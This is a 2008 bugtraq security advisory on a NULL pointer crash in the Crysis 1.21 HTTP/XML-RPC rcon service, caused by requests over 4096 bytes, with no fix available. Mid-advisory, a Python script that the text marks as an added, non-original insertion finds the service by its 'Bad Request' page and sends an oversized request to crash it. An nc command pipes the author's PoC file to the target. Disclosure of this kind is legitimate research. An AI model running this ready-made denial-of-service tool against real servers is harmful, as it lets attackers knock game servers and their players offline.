bugtraq June 2008 archive

NULL pointer in the HTTP/XML-RPC service of Crysis 1.21

From: Luigi Auriemma <aluigi_at_nospam>
Date: Mon Jun 16 2008 - 21:46:51 GMT
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk, packet@packetstormsecurity.org, cert@cert.org, news@securiteam.com

#######################################################################
Luigi Auriemma

Application:  Crysis
              http://www.ea.com/crysis/home.jsp
Versions:     <= 1.21 (1.1.1.6156 shown as gamever)
Platforms:    Windows
Bug:          NULL pointer in the HTTP/XML-RPC service
Exploitation: remote, versus server
Date:         16 Jun 2008
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org
#######################################################################
1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################


1) Introduction

Crysis is a recent FPS game developed by Crytek (http://www.crytek.com) and released in November 2007.
The game is well known as a "computer killer" because of its high hardware requirements, and also for its various problems with cheaters.

#######################################################################



2) Bug

Crysis has a small internal HTTP/XML-RPC server which must be activated with the http_startserver command (manually or through server.cfg) and which accepts rcon commands.

This service listens on port 80 if no port is specified, but admins usually choose a custom port or reuse the game's own port (64087). The service is easy to recognise: the page it returns to a web browser has the title "Bad Request".

If an attacker sends an HTTP request whose total length exceeds 4096 bytes, the server crashes because of a NULL pointer dereference.
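The following script is an added example, not part of the original advisory and not the dontcrysis.txt file linked below. It builds a syntactically valid HTTP request that crosses the 4096-byte boundary described above (the padding header name X-Pad is an arbitrary choice) and includes a simple fingerprint check based on the "Bad Request" title the advisory mentions; whether that string appears verbatim in the response body is an assumption.

```python
import socket
import sys

# The advisory states that any HTTP request whose TOTAL length exceeds
# 4096 bytes crashes the service. The request line below is a normal one;
# the size is reached by padding a single header. The header name "X-Pad"
# is an assumption (the server never gets as far as interpreting it).
REQUEST_LINE = b"GET / HTTP/1.0\r\n"
THRESHOLD = 4096


def build_oversized_request(total_len=THRESHOLD + 1, host=b"localhost"):
    """Return a complete HTTP request of exactly total_len bytes (> 4096)."""
    if total_len <= THRESHOLD:
        raise ValueError("request must exceed 4096 bytes to reach the bug")
    head = REQUEST_LINE + b"Host: " + host + b"\r\nX-Pad: "
    tail = b"\r\n\r\n"  # end of headers, so the request is well-formed
    pad_len = total_len - len(head) - len(tail)
    if pad_len < 0:
        raise ValueError("total_len too small for the fixed headers")
    req = head + b"A" * pad_len + tail
    assert len(req) == total_len
    return req


def looks_like_crysis_http(response: bytes) -> bool:
    """Fingerprint check: the advisory says the service shows a 'Bad Request'
    title to a browser. Assumption: that text is present in the reply as-is."""
    return b"bad request" in response.lower()


def send_request(host, port, req, timeout=5.0):
    """Send req and return whatever the service replies.
    Returns b'' if the peer resets the connection or stays silent, which is
    what a crashed server looks like from the client side."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(req)
        try:
            return s.recv(4096)
        except (socket.timeout, ConnectionResetError):
            return b""


if __name__ == "__main__":
    # usage: python this.py SERVER HTTPPORT
    # First a harmless request to fingerprint, then the oversized one.
    target, port = sys.argv[1], int(sys.argv[2])
    probe = send_request(target, port, b"GET / HTTP/1.0\r\n\r\n")
    print("fingerprint matched:", looks_like_crysis_http(probe))
    reply = send_request(target, port, build_oversized_request())
    print("reply to oversized request:", reply[:80] or b"<none>")
```

The builder asserts on the exact byte count so that the request really crosses the threshold the advisory names; the length that matters is the total request, not the length of any one header.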

#######################################################################



3) The Code

http://aluigi.org/poc/dontcrysis.txt

  nc SERVER HTTPPORT -v -v < dontcrysis.txt

#######################################################################



4) Fix

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org